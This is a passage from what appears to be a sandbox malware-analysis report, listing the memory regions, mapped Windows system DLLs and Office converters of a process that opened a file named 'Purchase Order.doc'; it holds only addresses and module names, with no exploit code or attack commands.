"\\Windows\\System32\\vcruntime140.dll" (normalized: "c:\\windows\\system32\\vcruntime140.dll") Region: id = 396 start_va = 0x7ffb48250000 end_va = 0x7ffb484c3fff monitored = 0 entry_point = 0x7ffb482c0400 region_type = mapped_file name = "comctl32.dll" filename = "\\Windows\\WinSxS\\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.10586.0_none_8c15ae12515e1c22\\comctl32.dll" (normalized: "c:\\windows\\winsxs\\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.10586.0_none_8c15ae12515e1c22\\comctl32.dll") Region: id = 397 start_va = 0x7ffb48f80000 end_va = 0x7ffb49030fff monitored = 0 entry_point = 0x7ffb48f908f0 region_type = mapped_file name = "twinapi.dll" filename = "\\Windows\\System32\\twinapi.dll" (normalized: "c:\\windows\\system32\\twinapi.dll") Region: id = 398 start_va = 0x7ffb493e0000 end_va = 0x7ffb493ebfff monitored = 0 entry_point = 0x7ffb493e35c0 region_type = mapped_file name = "secur32.dll" filename = "\\Windows\\System32\\secur32.dll" (normalized: "c:\\windows\\system32\\secur32.dll") Region: id = 399 start_va = 0x7ffb49570000 end_va = 0x7ffb495affff monitored = 0 entry_point = 0x7ffb49586c60 region_type = mapped_file name = "netprofm.dll" filename = "\\Windows\\System32\\netprofm.dll" (normalized: "c:\\windows\\system32\\netprofm.dll") Region: id = 400 start_va = 0x7ffb4b570000 end_va = 0x7ffb4b5d7fff monitored = 0 entry_point = 0x7ffb4b574970 region_type = mapped_file name = "mscoree.dll" filename = "\\Windows\\System32\\mscoree.dll" (normalized: "c:\\windows\\system32\\mscoree.dll") Region: id = 401 start_va = 0x7ffb4b680000 end_va = 0x7ffb4b6e1fff monitored = 0 entry_point = 0x7ffb4b681a50 region_type = mapped_file name = "d3d10_1core.dll" filename = "\\Windows\\System32\\d3d10_1core.dll" (normalized: "c:\\windows\\system32\\d3d10_1core.dll") Region: id = 402 start_va = 0x7ffb4b900000 end_va = 0x7ffb4b931fff monitored = 0 entry_point = 0x7ffb4b9211c0 region_type = mapped_file name = "d3d10_1.dll" filename = "\\Windows\\System32\\d3d10_1.dll" (normalized: "c:\\windows\\system32\\d3d10_1.dll") Region: id = 403 start_va = 0x7ffb4b960000 end_va = 0x7ffb4b96dfff monitored = 0 entry_point = 0x7ffb4b961460 region_type = mapped_file name = "npmproxy.dll" filename = "\\Windows\\System32\\npmproxy.dll" (normalized: "c:\\windows\\system32\\npmproxy.dll") Region: id = 404 start_va = 0x7ffb4bb80000 end_va = 0x7ffb4bc03fff monitored = 0 entry_point = 0x7ffb4bb92830 region_type = mapped_file name = "winspool.drv" filename = "\\Windows\\System32\\winspool.drv" (normalized: "c:\\windows\\system32\\winspool.drv") Region: id = 405 start_va = 0x7ffb4c0a0000 end_va = 0x7ffb4c0b7fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 406 start_va = 0x7ffb4c1b0000 end_va = 0x7ffb4c429fff monitored = 0 entry_point = 0x7ffb4c1ca7a0 region_type = mapped_file name = "msxml6.dll" filename = "\\Windows\\System32\\msxml6.dll" (normalized: "c:\\windows\\system32\\msxml6.dll") Region: id = 407 start_va = 0x7ffb4c8d0000 end_va = 0x7ffb4ca54fff monitored = 0 entry_point = 0x7ffb4c916180 region_type = mapped_file name = "windows.globalization.dll" filename = "\\Windows\\System32\\Windows.Globalization.dll" (normalized: "c:\\windows\\system32\\windows.globalization.dll") Region: id = 408 start_va = 0x7ffb4ca60000 end_va = 0x7ffb4ccbffff monitored = 0 entry_point = 0x7ffb4cb0b5b0 region_type = mapped_file name = "dwrite.dll" filename = "\\Windows\\System32\\DWrite.dll" (normalized: "c:\\windows\\system32\\dwrite.dll") Region: id = 409 start_va = 0x7ffb4fea0000 end_va = 0x7ffb4fec8fff monitored = 0 entry_point = 0x7ffb4feaca00 region_type = mapped_file name = "cabinet.dll" filename = "\\Windows\\System32\\cabinet.dll" (normalized: "c:\\windows\\system32\\cabinet.dll") Region: id = 410 start_va = 0x7ffb4fed0000 end_va = 0x7ffb4ff05fff monitored = 0 entry_point = 0x7ffb4fee0070 region_type = mapped_file name = "xmllite.dll" filename = "\\Windows\\System32\\xmllite.dll" (normalized: "c:\\windows\\system32\\xmllite.dll") Region: id = 411 start_va = 0x7ffb4ff10000 end_va = 0x7ffb50454fff monitored = 0 entry_point = 0x7ffb500aa450 region_type = mapped_file name = "d2d1.dll" filename = "\\Windows\\System32\\d2d1.dll" (normalized: "c:\\windows\\system32\\d2d1.dll") Region: id = 412 start_va = 0x7ffb50460000 end_va = 0x7ffb506cefff monitored = 0 entry_point = 0x7ffb505122b0 region_type = mapped_file name = "d3d10warp.dll" filename = "\\Windows\\System32\\d3d10warp.dll" (normalized: "c:\\windows\\system32\\d3d10warp.dll") Region: id = 413 start_va = 0x7ffb50810000 end_va = 0x7ffb509c0fff monitored = 0 entry_point = 0x7ffb508a61a0 region_type = mapped_file name = "windowscodecs.dll" filename = "\\Windows\\System32\\WindowsCodecs.dll" (normalized: "c:\\windows\\system32\\windowscodecs.dll") Region: id = 414 start_va = 0x7ffb50b90000 end_va = 0x7ffb50bbffff monitored = 0 entry_point = 0x7ffb50ba9b10 region_type = mapped_file name = "globinputhost.dll" filename = "\\Windows\\System32\\globinputhost.dll" (normalized: "c:\\windows\\system32\\globinputhost.dll") Region: id = 415 start_va = 0x7ffb510d0000 end_va = 0x7ffb51136fff monitored = 0 entry_point = 0x7ffb510ee710 region_type = mapped_file name = "bcp47langs.dll" filename = "\\Windows\\System32\\BCP47Langs.dll" (normalized: "c:\\windows\\system32\\bcp47langs.dll") Region: id = 416 start_va = 0x7ffb51190000 end_va = 0x7ffb51231fff monitored = 0 entry_point = 0x7ffb511b0a40 region_type = mapped_file name = "dxgi.dll" filename = "\\Windows\\System32\\dxgi.dll" (normalized: "c:\\windows\\system32\\dxgi.dll") Region: id = 417 start_va = 0x7ffb51240000 end_va = 0x7ffb514e7fff monitored = 0 entry_point = 0x7ffb512d3250 region_type = mapped_file name = "d3d11.dll" filename = "\\Windows\\System32\\d3d11.dll" (normalized: "c:\\windows\\system32\\d3d11.dll") Region: id = 418 start_va = 0x7ffb514f0000 end_va = 0x7ffb51511fff monitored = 0 entry_point = 0x7ffb514f1a40 region_type = mapped_file name = "dwmapi.dll" filename = "\\Windows\\System32\\dwmapi.dll" (normalized: "c:\\windows\\system32\\dwmapi.dll") Region: id = 419 start_va = 0x7ffb51600000 end_va = 0x7ffb516e2fff monitored = 0 entry_point = 0x7ffb51637da0 region_type = mapped_file name = "dcomp.dll" filename = "\\Windows\\System32\\dcomp.dll" (normalized: "c:\\windows\\system32\\dcomp.dll") Region: id = 420 start_va = 0x7ffb519f0000 end_va = 0x7ffb51b75fff monitored = 0 entry_point = 0x7ffb51a3d700 region_type = mapped_file name = "propsys.dll" filename = "\\Windows\\System32\\propsys.dll" (normalized: "c:\\windows\\system32\\propsys.dll") Region: id = 421 start_va = 0x7ffb51be0000 end_va = 0x7ffb51bf2fff monitored = 0 entry_point = 0x7ffb51be2760 region_type = mapped_file name = "wtsapi32.dll" filename = "\\Windows\\System32\\wtsapi32.dll" (normalized: "c:\\windows\\system32\\wtsapi32.dll") Region: id = 422 start_va = 0x7ffb51c00000 end_va = 0x7ffb51c24fff monitored = 0 entry_point = 0x7ffb51c02300 region_type = mapped_file name = "sppc.dll" filename = "\\Windows\\System32\\sppc.dll" (normalized: "c:\\windows\\system32\\sppc.dll") Region: id = 423 start_va = 0x7ffb51c60000 end_va = 0x7ffb51c84fff monitored = 0 entry_point = 0x7ffb51c75220 region_type = mapped_file name = "slc.dll" filename = "\\Windows\\System32\\slc.dll" (normalized: "c:\\windows\\system32\\slc.dll") Region: id = 424 start_va = 0x7ffb51c90000 end_va = 0x7ffb51c99fff monitored = 0 entry_point = 0x7ffb51c91350 region_type = mapped_file name = "version.dll" filename = "\\Windows\\System32\\version.dll" (normalized: "c:\\windows\\system32\\version.dll") Region: id = 425 start_va = 0x7ffb51df0000 end_va = 0x7ffb51e85fff monitored = 0 entry_point = 0x7ffb51e15570 region_type = mapped_file name = "uxtheme.dll" filename = "\\Windows\\System32\\uxtheme.dll" (normalized: "c:\\windows\\system32\\uxtheme.dll") Region: id = 426 start_va = 0x7ffb51f90000 end_va = 0x7ffb5208ffff monitored = 0 entry_point = 0x7ffb51fd0f80 region_type = mapped_file name = "twinapi.appcore.dll" filename = "\\Windows\\System32\\twinapi.appcore.dll" (normalized: "c:\\windows\\system32\\twinapi.appcore.dll") Region: id = 427 start_va = 0x7ffb52610000 end_va = 0x7ffb52703fff monitored = 0 entry_point = 0x7ffb5261a960 region_type = mapped_file name = "ucrtbase.dll" filename = "\\Windows\\System32\\ucrtbase.dll" (normalized: "c:\\windows\\system32\\ucrtbase.dll") Region: id = 428 start_va = 0x7ffb530f0000 end_va = 0x7ffb5311cfff monitored = 0 entry_point = 0x7ffb53109d40 region_type = mapped_file name = "sspicli.dll" filename = "\\Windows\\System32\\sspicli.dll" (normalized: "c:\\windows\\system32\\sspicli.dll") Region: id = 429 start_va = 0x7ffb53280000 end_va = 0x7ffb532d5fff monitored = 0 entry_point = 0x7ffb53290bf0 region_type = mapped_file name = "winsta.dll" filename = "\\Windows\\System32\\winsta.dll" (normalized: "c:\\windows\\system32\\winsta.dll") Region: id = 430 start_va = 0x7ffb53300000 end_va = 0x7ffb53328fff monitored = 0 entry_point = 0x7ffb53314530 region_type = mapped_file name = "bcrypt.dll" filename = "\\Windows\\System32\\bcrypt.dll" (normalized: "c:\\windows\\system32\\bcrypt.dll") Region: id = 431 start_va = 0x7ffb53470000 end_va = 0x7ffb5347efff monitored = 0 entry_point = 0x7ffb53473210 region_type = mapped_file name = "kernel.appcore.dll" filename = "\\Windows\\System32\\kernel.appcore.dll" (normalized: "c:\\windows\\system32\\kernel.appcore.dll") Region: id = 432 start_va = 0x7ffb53480000 end_va = 0x7ffb534cafff monitored = 0 entry_point = 0x7ffb534835f0 region_type = mapped_file name = "powrprof.dll" filename = "\\Windows\\System32\\powrprof.dll" (normalized: "c:\\windows\\system32\\powrprof.dll") Region: id = 433 start_va = 0x7ffb534d0000 end_va = 0x7ffb534e3fff monitored = 0 entry_point = 0x7ffb534d52e0 region_type = mapped_file name = "profapi.dll" filename = "\\Windows\\System32\\profapi.dll" (normalized: "c:\\windows\\system32\\profapi.dll") Region: id = 434 start_va = 0x7ffb53520000 end_va = 0x7ffb53b63fff monitored = 0 entry_point = 0x7ffb536e64b0 region_type = mapped_file name = "windows.storage.dll" filename = "\\Windows\\System32\\windows.storage.dll" (normalized: "c:\\windows\\system32\\windows.storage.dll") Region: id = 435 start_va = 0x7ffb53b70000 end_va = 0x7ffb53d57fff monitored = 0 entry_point = 0x7ffb53b9ba70 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 436 start_va = 0x7ffb540d0000 end_va = 0x7ffb54139fff monitored = 0 entry_point = 0x7ffb54106d50 region_type = mapped_file name = "bcryptprimitives.dll" filename = "\\Windows\\System32\\bcryptprimitives.dll" (normalized: "c:\\windows\\system32\\bcryptprimitives.dll") Region: id = 437 start_va = 0x7ffb54140000 end_va = 0x7ffb541f4fff monitored = 0 entry_point = 0x7ffb541822e0 region_type = mapped_file name = "shcore.dll" filename = "\\Windows\\System32\\SHCore.dll" (normalized: "c:\\windows\\system32\\shcore.dll") Region: id = 438 start_va = 0x7ffb54200000 end_va = 0x7ffb54242fff monitored = 0 entry_point = 0x7ffb54214b50 region_type = mapped_file name = "cfgmgr32.dll" filename = "\\Windows\\System32\\cfgmgr32.dll" (normalized: "c:\\windows\\system32\\cfgmgr32.dll") Region: id = 439 start_va = 0x7ffb54250000 end_va = 0x7ffb542befff monitored = 0 entry_point = 0x7ffb54275f70 region_type = mapped_file name = "coml2.dll" filename = "\\Windows\\System32\\coml2.dll" (normalized: "c:\\windows\\system32\\coml2.dll") Region: id = 440 start_va = 0x7ffb543d0000 end_va = 0x7ffb5464cfff monitored = 0 entry_point = 0x7ffb544a4970 region_type = mapped_file name = "combase.dll" filename = "\\Windows\\System32\\combase.dll" (normalized: "c:\\windows\\system32\\combase.dll") Region: id = 441 start_va = 0x7ffb54680000 end_va = 0x7ffb547d5fff monitored = 0 entry_point = 0x7ffb5468a8d0 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 442 start_va = 0x7ffb54840000 end_va = 0x7ffb548dcfff monitored = 0 entry_point = 0x7ffb548478a0 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 443 start_va = 0x7ffb548e0000 end_va = 0x7ffb54a65fff monitored = 0 entry_point = 0x7ffb5492ffc0 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 444 start_va = 0x7ffb54a70000 end_va = 0x7ffb54adafff monitored = 0 entry_point = 0x7ffb54a890c0 region_type = mapped_file name = "ws2_32.dll" filename = "\\Windows\\System32\\ws2_32.dll" (normalized: "c:\\windows\\system32\\ws2_32.dll") Region: id = 445 start_va = 0x7ffb54ae0000 end_va = 0x7ffb54c39fff monitored = 0 entry_point = 0x7ffb54b238e0 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Region: id = 446 start_va = 0x7ffb54e50000 end_va = 0x7ffb54f92fff monitored = 0 entry_point = 0x7ffb54e78210 region_type = mapped_file name = "ole32.dll" filename = "\\Windows\\System32\\ole32.dll" (normalized: "c:\\windows\\system32\\ole32.dll") Region: id = 447 start_va = 0x7ffb54fa0000 end_va = 0x7ffb55046fff monitored = 0 entry_point = 0x7ffb54fb58d0 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll") Region: id = 448 start_va = 0x7ffb55050000 end_va = 0x7ffb550fcfff monitored = 0 entry_point = 0x7ffb550681a0 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 449 start_va = 0x7ffb55100000 end_va = 0x7ffb5515afff monitored = 0 entry_point = 0x7ffb551138b0 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 450 start_va = 0x7ffb55160000 end_va = 0x7ffb5527bfff monitored = 0 entry_point = 0x7ffb551a02b0 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 451 start_va = 0x7ffb55280000 end_va = 0x7ffb55326fff monitored = 0 entry_point = 0x7ffb5528b4d0 region_type = mapped_file name = "clbcatq.dll" filename = "\\Windows\\System32\\clbcatq.dll" (normalized: "c:\\windows\\system32\\clbcatq.dll") Region: id = 452 start_va = 0x7ffb55770000 end_va = 0x7ffb56ccefff monitored = 0 entry_point = 0x7ffb558d11f0 region_type = mapped_file name = "shell32.dll" filename = "\\Windows\\System32\\shell32.dll" (normalized: "c:\\windows\\system32\\shell32.dll") Region: id = 453 start_va = 0x7ffb56cd0000 end_va = 0x7ffb56d90fff monitored = 0 entry_point = 0x7ffb56cf0da0 region_type = mapped_file name = "oleaut32.dll" filename = "\\Windows\\System32\\oleaut32.dll" (normalized: "c:\\windows\\system32\\oleaut32.dll") Region: id = 454 start_va = 0x7ffb56da0000 end_va = 0x7ffb56ddafff monitored = 0 entry_point = 0x7ffb56da12f0 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 455 start_va = 0x7ffb56df0000 end_va = 0x7ffb56e41fff monitored = 0 entry_point = 0x7ffb56dff530 region_type = mapped_file name = "shlwapi.dll" filename = "\\Windows\\System32\\shlwapi.dll" (normalized: "c:\\windows\\system32\\shlwapi.dll") Region: id = 456 start_va = 0x7ffb56e50000 end_va = 0x7ffb57010fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 457 start_va = 0x7ffb52df0000 end_va = 0x7ffb52e06fff monitored = 0 entry_point = 0x7ffb52df79d0 region_type = mapped_file name = "cryptsp.dll" filename = "\\Windows\\System32\\cryptsp.dll" (normalized: "c:\\windows\\system32\\cryptsp.dll") Region: id = 458 start_va = 0x7ffb52a80000 end_va = 0x7ffb52ab3fff monitored = 0 entry_point = 0x7ffb52a9ae70 region_type = mapped_file name = "rsaenh.dll" filename = "\\Windows\\System32\\rsaenh.dll" (normalized: "c:\\windows\\system32\\rsaenh.dll") Region: id = 459 start_va = 0x7ffb52f10000 end_va = 0x7ffb52f1afff monitored = 0 entry_point = 0x7ffb52f119a0 region_type = mapped_file name = "cryptbase.dll" filename = "\\Windows\\System32\\cryptbase.dll" (normalized: "c:\\windows\\system32\\cryptbase.dll") Region: id = 462 start_va = 0x1912b2f0000 end_va = 0x1912b2f0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000001912b2f0000" filename = "" Region: id = 463 start_va = 0x7ffb496a0000 end_va = 0x7ffb49857fff monitored = 0 entry_point = 0x7ffb4970e630 region_type = mapped_file name = "urlmon.dll" filename = "\\Windows\\System32\\urlmon.dll" (normalized: "c:\\windows\\system32\\urlmon.dll") Region: id = 464 start_va = 0x7ffb4d300000 end_va = 0x7ffb4d681fff monitored = 0 entry_point = 0x7ffb4d351220 region_type = mapped_file name = "iertutil.dll" filename = "\\Windows\\System32\\iertutil.dll" (normalized: "c:\\windows\\system32\\iertutil.dll") Region: id = 465 start_va = 0x1912b2f0000 end_va = 0x1912b2f0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000001912b2f0000" filename = "" Region: id = 466 start_va = 0x19132220000 end_va = 0x1913321ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000019132220000" filename = "" Region: id = 467 start_va = 0x1912b300000 end_va = 0x1912b37ffff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "purchase order.docff74d66c148a7b73b0fb2a57ab2e015576cb2272db5dfbdoc0fb2a57ab2e015576cb2272db5dfbdoc" filename = "\\Users\\RDhJ0CNFevzX\\Desktop\\Purchase Order.docff74d66c148a7b73b0fb2a57ab2e015576cb2272db5dfbdoc0fb2a57ab2e015576cb2272db5dfbdoc" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\purchase order.docff74d66c148a7b73b0fb2a57ab2e015576cb2272db5dfbdoc0fb2a57ab2e015576cb2272db5dfbdoc") Region: id = 468 start_va = 0x7ffb4ead0000 end_va = 0x7ffb4eadcfff monitored = 0 entry_point = 0x7ffb4ead307c region_type = mapped_file name = "wordcnvpxy.cnv" filename = "\\Program Files\\Microsoft Office\\Office16\\Wordcnvpxy.cnv" (normalized: "c:\\program files\\microsoft office\\office16\\wordcnvpxy.cnv") Region: id = 469 start_va = 0x7ffb4ead0000 end_va = 0x7ffb4eadcfff monitored = 0 entry_point = 0x7ffb4ead307c region_type = mapped_file name = "wordcnvpxy.cnv" filename = "\\Program Files\\Microsoft Office\\Office16\\Wordcnvpxy.cnv" (normalized: "c:\\program files\\microsoft office\\office16\\wordcnvpxy.cnv") Region: id = 470 start_va = 0x7ffb4ead0000 end_va = 0x7ffb4eadefff monitored = 0 entry_point = 0x7ffb4ead2f9c region_type = mapped_file name = "recovr32.cnv" filename = "\\Program Files\\Common Files\\microsoft shared\\TextConv\\RECOVR32.CNV" (normalized: "c:\\program files\\common files\\microsoft shared\\textconv\\recovr32.cnv") Region: id = 471 start_va = 0x7ffb4eaa0000 end_va = 0x7ffb4eac6fff monitored = 0 entry_point = 0x7ffb4eaaefac region_type = mapped_file name = "msconv97.dll" filename = "\\Program Files\\Common Files\\microsoft shared\\TextConv\\MSCONV97.DLL" (normalized: "c:\\program files\\common files\\microsoft shared\\textconv\\msconv97.dll") Region: id = 472 start_va = 0x7ffb4eaa0000 end_va = 0x7ffb4ead8fff monitored = 0 entry_point = 0x7ffb4eac1a4c region_type = mapped_file name = "wpft532.cnv" filename = "\\Program Files\\Common Files\\microsoft shared\\TextConv\\WPFT532.CNV" (normalized: "c:\\program files\\common files\\microsoft shared\\textconv\\wpft532.cnv") Region: id = 473 start_va = 0x7ffb4b8d0000 end_va = 0x7ffb4b8f6fff monitored = 0 entry_point = 0x7ffb4b8defac region_type = mapped_file name = "msconv97.dll" filename = "\\Program Files\\Common Files\\microsoft shared\\TextConv\\MSCONV97.DLL" (normalized: "c:\\program files\\common files\\microsoft shared\\textconv\\msconv97.dll") Region: id = 474 start_va = 0x7ffb4ea90000 end_va = 0x7ffb4eadefff monitored = 0 entry_point = 0x7ffb4eabbd6c region_type = mapped_file name = "wpft632.cnv" filename = "\\Program Files\\Common Files\\microsoft shared\\TextConv\\WPFT632.CNV" (normalized: "c:\\program files\\common files\\microsoft shared\\textconv\\wpft632.cnv") Region: id = 475 start_va = 0x7ffb4b8d0000 end_va = 0x7ffb4b8f6fff monitored = 0 entry_point = 0x7ffb4b8defac region_type = mapped_file name = "msconv97.dll" filename = "\\Program Files\\Common Files\\microsoft shared\\TextConv\\MSCONV97.DLL" (normalized: "c:\\program files\\common files\\microsoft shared\\textconv\\msconv97.dll") Region: id = 476 start_va = 0x7ffb4eaa0000 end_va = 0x7ffb4ead8fff monitored = 0 entry_point = 0x7ffb4eac1a4c region_type = mapped_file name = "wpft532.cnv" filename = "\\Program Files\\Common Files\\microsoft shared\\TextConv\\WPFT532.CNV" (normalized: "c:\\program files\\common files\\microsoft shared\\textconv\\wpft532.cnv") Region: id = 477 start_va = 0x7ffb4b8d0000 end_va = 0x7ffb4b8f6fff monitored = 0 entry_point = 0x7ffb4b8defac region_type = mapped_file name = "msconv97.dll" filename = "\\Program Files\\Common Files\\microsoft shared\\TextConv\\MSCONV97.DLL" (normalized: "c:\\program files\\common files\\microsoft shared\\textconv\\msconv97.dll") Region: id = 478 start_va = 0x19132220000 end_va = 0x1913321ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000019132220000" filename = "" Region: id = 479 start_va = 0x1912b300000 end_va = 0x1912b37ffff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "purchase order.doc" filename = "\\Users\\RDhJ0CNFevzX\\Desktop\\Purchase Order.doc" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\purchase order.doc") Region: id = 480 start_va = 0x7ffb4ea90000 end_va = 0x7ffb4eadefff monitored = 0 entry_point = 0x7ffb4eabbd6c region_type = mapped_file name = "wpft632.cnv" filename = "\\Program Files\\Common Files\\microsoft shared\\TextConv\\WPFT632.CNV" (normalized: "c:\\program files\\common files\\microsoft shared\\textconv\\wpft632.cnv") Region: id = 481 start_va = 0x7ffb4b8d0000 end_va = 0x7ffb4b8f6fff monitored = 0 entry_point = 0x7ffb4b8defac region_type = mapped_file name = "msconv97.dll" filename = "\\Program Files\\Common Files\\microsoft shared\\TextConv\\MSCONV97.DLL" (normalized: "c:\\program files\\common files\\microsoft shared\\textconv\\msconv97.dll") Region: id = 482 start_va = 0x19132220000 end_va = 0x1913321ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000019132220000" filename = "" Region: id = 483 start_va = 0x1912b300000 end_va = 0x1912b304fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "purchase order.doc" filename = "\\Users\\RDhJ0CNFevzX\\Desktop\\Purchase Order.doc" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\purchase order.doc") Region: id = 484 start_va = 0x19132220000 end_va = 0x1913321ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000019132220000" filename = "" Region: id = 485 start_va = 0x1912b300000 end_va = 0x1912b37ffff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "purchase order.doc" filename = "\\Users\\RDhJ0CNFevzX\\Desktop\\Purchase Order.doc" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\purchase order.doc") Region: id = 486 start_va = 0x7ffb4eaa0000 end_va = 0x7ffb4ead8fff monitored = 0 entry_point = 0x7ffb4eac1a4c region_type = mapped_file name = "wpft532.cnv" filename = "\\Program Files\\Common Files\\microsoft shared\\TextConv\\WPFT532.CNV" (normalized: "c:\\program files\\common files\\microsoft shared\\textconv\\wpft532.cnv") Region: id = 487 start_va = 0x7ffb4b8d0000 end_va = 0x7ffb4b8f6fff monitored = 0 entry_point = 0x7ffb4b8defac region_type = mapped_file name = "msconv97.dll" filename = "\\Program Files\\Common Files\\microsoft shared\\TextConv\\MSCONV97.DLL" (normalized: "c:\\program files\\common files\\microsoft shared\\textconv\\msconv97.dll") Region: id = 488 start_va = 0x19132220000 end_va = 0x1913321ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000019132220000" filename = "" Region: id = 489 start_va = 0x1912b300000 end_va = 0x1912b37ffff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "purchase order.doc" filename = "\\Users\\RDhJ0CNFevzX\\Desktop\\Purchase Order.doc" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\purchase order.doc") Region: id = 490 start_va = 0x7ffb4ea90000 end_va = 0x7ffb4eadefff monitored = 0 entry_point = 0x7ffb4eabbd6c region_type = mapped_file name = "wpft632.cnv" filename = "\\Program Files\\Common Files\\microsoft shared\\TextConv\\WPFT632.CNV" (normalized: "c:\\program files\\common files\\microsoft shared\\textconv\\wpft632.cnv") Region: id = 491 start_va = 0x7ffb4b8d0000 end_va = 0x7ffb4b8f6fff monitored = 0 entry_point = 0x7ffb4b8defac region_type = mapped_file name = "msconv97.dll" filename = "\\Program Files\\Common Files\\microsoft shared\\TextConv\\MSCONV97.DLL" (normalized: "c:\\program files\\common files\\microsoft shared\\textconv\\msconv97.dll") Region: id = 492 start_va = 0x19132220000 end_va = 0x1913321ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000019132220000" filename = "" Region: id = 493 start_va = 0x1912b300000 end_va = 0x1912b304fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "purchase order.doc" filename = "\\Users\\RDhJ0CNFevzX\\Desktop\\Purchase Order.doc" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\purchase order.doc") Region: id = 494 start_va = 0x19132220000 end_va = 0x1913321ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000019132220000" filename = "" Region: id = 495 start_va = 0x1912b300000 end_va = 0x1912b37ffff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "purchase order.doc" filename = "\\Users\\RDhJ0CNFevzX\\Desktop\\Purchase Order.doc" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\purchase order.doc") Region: id = 496 start_va = 0x19132220000 end_va = 0x1913321ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000019132220000" filename = "" Region: id = 497 start_va = 0x1912b300000 end_va = 0x1912b302fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "sfc.dll" filename = "\\Windows\\System32\\sfc.dll" (normalized: "c:\\windows\\system32\\sfc.dll") Region: id = 498 start_va = 0x7ffb4cf00000 end_va = 0x7ffb4cf10fff monitored = 0 entry_point = 0x7ffb4cf03e10 region_type = mapped_file name = "sfc_os.dll" filename = "\\Windows\\System32\\sfc_os.dll" (normalized: "c:\\windows\\system32\\sfc_os.dll") Region: id = 499 start_va = 0x7ffb3f300000 end_va = 0x7ffb3f9fdfff monitored = 0 entry_point = 0x7ffb3f352fcc region_type = mapped_file name = "csi.dll" filename = "\\Program Files\\Common Files\\microsoft shared\\OFFICE16\\Csi.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\office16\\csi.dll") Region: id = 500 start_va = 0x7ffb4eaa0000 end_va = 0x7ffb4eadafff monitored = 0 entry_point = 0x7ffb4eaa1640 region_type = mapped_file name = "peerdist.dll" filename = "\\Windows\\System32\\PeerDist.dll" (normalized: "c:\\windows\\system32\\peerdist.dll") Region: id = 501 start_va = 0x1912b310000 end_va = 0x1912b31ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000001912b310000" filename = "" Region: id = 502 start_va = 0x1912b320000 end_va = 0x1912b32ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000001912b320000" filename = "" Region: id = 503 start_va = 0x1912efb0000 end_va = 0x1912f0affff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000001912efb0000" filename = "" Region: id = 504 start_va = 0x7ffb40820000 end_va = 0x7ffb40888fff monitored = 0 entry_point = 0x7ffb4082d3a8 region_type = mapped_file name = "aceoledb.dll" filename = "\\Program Files\\Common Files\\microsoft shared\\OFFICE16\\ACEOLEDB.DLL" (normalized: "c:\\program files\\common files\\microsoft shared\\office16\\aceoledb.dll") Region: id = 505 start_va = 0x7ffb3f200000 end_va = 0x7ffb3f2f0fff monitored = 0 entry_point = 0x7ffb3f220820 region_type = mapped_file name = "oledb32.dll" filename = "\\Program Files\\Common Files\\System\\Ole DB\\oledb32.dll" (normalized: "c:\\program files\\common files\\system\\ole db\\oledb32.dll") Region: id = 506 start_va = 0x1912b330000 end_va = 